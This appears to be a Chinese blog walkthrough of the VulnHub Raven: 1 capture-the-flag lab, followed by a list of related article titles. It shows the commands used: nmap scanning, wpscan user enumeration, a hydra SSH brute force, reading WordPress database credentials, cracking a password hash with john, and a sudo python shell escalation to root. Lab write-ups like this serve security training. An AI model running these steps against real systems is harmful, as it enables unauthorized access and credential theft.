vulnhub-Rave: 1

靶机地址:https://www.vulnhub.com/entry/raven-1,256/

目标:找到四个flag.txt信息

作者:尼德霍格007

时间:2021-8-7

一、信息收集

nmap扫描存活主机

nmap -sP 192.168.21.0/24

扫描端口开放情况

nmap -A -p- 192.168.21.150

看到目标主机开放了这几个端口

先访问一下web

在service的源码中发现了第一个flag

flag1{b9bbcb33e11b80be759c4e844862482d}

然后点进BLOG发现用的是wordpress

二、获取shell

探测WordPress的漏洞,可以直接使用kali自带的WPscan,先暴力枚举用户名

wpscan --url http://192.168.137.142/wordpress/ -eu

发现了两个用户michael和steven

保存为user.txt

直接上九头蛇使用自身密码库进行暴力破解

hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://192.168.137.142

获得账户michael和michael

ssh登陆

ssh michael@192.168.21.150

三、提权

进来之后进入网站根目录

cd /var/www

发现flag2

flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

之前我们发现网站是用WordPress搭建的,我们再去找找相关的配置文件

在配置文件中找到了数据库的账户和密码

进mysql看看

mysql -uroot -p

选择wordpress库

在wp_posts表中发现了flag3和flag4

select * from wp_posts;

flag3{afc01ab56b50591e7dccf93122770cd2}

flag4{715dea6c055b9fe3337544932f2941ce}

4个flag已经全部得到,本来到这里应该结束了,但是我们没有获取到rot权限,所以继续渗透

继续查看其他表

发现wp_users表中有steven的密码hash

$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/

使用john破解一下

先把steven的密码hash保存为txt文件

然后使用john破解,得到密码是pink84

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

然后我们使用steven登录

之后使用sudo+python命令的方式提权

sudo python -c 'import pty;pty.spawn("/bin/bash")'

进入/root目录查看flag4.txt,到此就结束了。

四、总结

因为之前打过Raven:2的靶机,所以这次做得比较顺利,主要是几种工具要熟练使用。

15-VulnHub-Raven 1相关推荐

  1. Vulnhub靶机渗透之 RAVEN: 1

    目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...

  2. Vulnhub系列:Raven 1

    该篇为Vulnhub系列靶机渗透,本次靶机存在4个flag.下面开始我们今天的渗透之旅.Raven靶机有很多种思路,我将对其进行一一整理. 首先进行信息收集,利用arp-scan和nmap,进行靶机的 ...

  3. 靶场练习第二十五天~vulnhub靶场之Raven-2

    一.准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机 ...

  4. 【Vulnhub】之JIS-CTF-VulnUpload-CTF01

    一. 部署方法 在官网上下载靶机ova环境:http://www.mediafire.com/file/t5b4nkynxkm9hj2/CTF01.ova 使用VMware搭建靶机环境 攻击机使用VM ...

  5. vulnhub刷题记录(The Planets: Earth)

    英文名称:The Planets: Earth 中文名称:行星:地球 发布日期:2021 年 11 月 2 日 难度:简单 描述:地球是一个简单的盒子,尽管您可能会发现它比本系列中的"水星& ...

  6. vulnhub 靶机渗透:Stapler

    Stapler nmap扫描 21 端口 22 53端口 80端口 目录爆破 139端口 666 端口 3306端口 12380端口 获取数据库root权限 获取系统立足点 提权 其他思路 系统立足点 ...

  7. Vulnhub 靶机测试NO.30 hacksudo FOG

    hacksudo FOG hacksudo FOG渗透测试 1 环境准备 2 测试过程 2.1 nmap 扫描端口 2.2 测试思路 2.3 浏览80 2.4 gobuster目录枚举 2.5 查看c ...

  8. vulnhub靶机练习-Os-hackNos-1

    今天带来的靶机是 vulnhub Os-hackNos-1 先看一下简介: 难度容易到中 flag 两个 一个是普通用户的user.txt 另外一个是root用户的user.txt 0.靶机简介: D ...

  9. Hacker_kid-v1.0.1(vulnhub)

    中等难度的靶机,取得权限即可(提示:信息收集,不需要爆破) 此靶机存在的都是新兴的漏洞类型. 地址如下: https://download.vulnhub.com/hackerkid/Hacker_K ...

  10. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

最新文章

  1. javaScript由哪些部分组成?
  2. sbt構建一個spark工程(scala+spark+sbt)
  3. QuartZ.net 常用配置说明
  4. 对IplImage 结构体的理解
  5. Git(2):安装和使用
  6. 新文速递 | 盒装数据:一种基于数据盒的数据产品形态
  7. WEB标准有什么好处?
  8. java.util.zip.ZipException: only DEFLATED entries can have EXT descriptor
  9. 初识Java反序列化
  10. 财务管理流程图怎么画之你需要了解的流程图绘制技巧
  11. Markdown中给图片增加超链接
  12. 问卷星不能复制粘贴?不存在的!
  13. PA 调试心得(一个电容引发的问题)
  14. [JMeter性能测试实战]之先从搭建测试环境开始
  15. vue下载大文件时浏览器不显示下载进度
  16. Zookeeper连接异常 Got ping response for sessionid 2021-06-30
  17. RARP协议的使用场景
  18. windows10 更换密码
  19. 标普500市值门槛提高今日生效 第一太阳能(First Solar)出局
  20. 计算机网口在哪看,打印机端口从哪里看,怎么设置?-电脑自学网

热门文章

  1. 【求助】ssh.service loaded(inactive) 问题
  2. 使用FileZilla连接时超时,无法连接到服务器
  3. Mac Big Sur keygen 您没有打开权限 问题;Unpacked 0 files.问题
  4. 大数据之Stream流
  5. Photoshop脚本 锁定图层组所有图层
  6. 微信小程序本地服务器搭建
  7. 路由url里多了%7D是怎么回事?
  8. 关于自建ip池可能出现的问题
  9. 使用pydot 画CNN网络结构图
  10. 部署CentOS可视化界面GUI-之腾讯云服务器